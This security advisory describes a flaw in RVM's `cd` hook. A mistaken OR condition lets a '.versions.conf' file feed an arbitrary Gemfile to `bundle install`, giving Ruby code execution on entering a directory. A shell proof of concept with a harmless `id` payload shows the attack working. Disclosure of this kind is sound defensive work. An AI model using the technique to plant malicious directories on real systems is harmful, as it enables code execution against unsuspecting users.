RVM, by default, hooks `cd` and automatically parses a file named
`.versions.conf` in the directory being changed to. The intention seems to be
that, if the user's `${rvm_autoinstall_bundler_flag}` setting is enabled, then
`.versions.conf` can specify a Gemfile that will automatically be fed to
`bundle install`. Due to an erroneous conditional that uses `||` (OR) instead
of `&&` (AND), `.versions.conf` can provide the name of an arbitrary Gemfile
that will automatically be fed to `bundle install` regardless of the state of
`${rvm_autoinstall_bundler_flag}`. The code responsible, as of a vulnerable
commit, is available at
<https://github.com/rvm/rvm/blob/b04c0158dbadc9a999a2af4f39bc008976b9ebf1/scripts/functions/rvmrc_project#L102-L113>.
This behaviour can be used to achieve immediate ruby code execution upon `cd`
into a malicious directory since Gemfiles are interpreted using Ruby
<https://github.com/bundler/bundler/issues/5178>
### POC
```text
rvm@e6aeaf6d79ec:~$ mkdir poc
rvm@e6aeaf6d79ec:~$ cat > poc/.versions.conf
ruby=ruby-2.3.0
ruby-bundle-install=.doot
^D
rvm@e6aeaf6d79ec:~$ cat > poc/.doot
`echo "Arbitrary ruby code execution as $(id)" >&2`
^D
rvm@e6aeaf6d79ec:~$ cd poc
installing gem bundler --no-ri --no-rdoc.
Arbitrary ruby code execution as uid=1000(rvm) gid=1000(rvm) groups=1000(rvm)
The Gemfile specifies no dependencies
Resolving dependencies...
Bundle complete! 0 Gemfile dependencies, 1 gem now installed.
Use `bundle show [gemname]` to see where a bundled gem is installed.
```
京公网安备 11010502034610号
暂无评论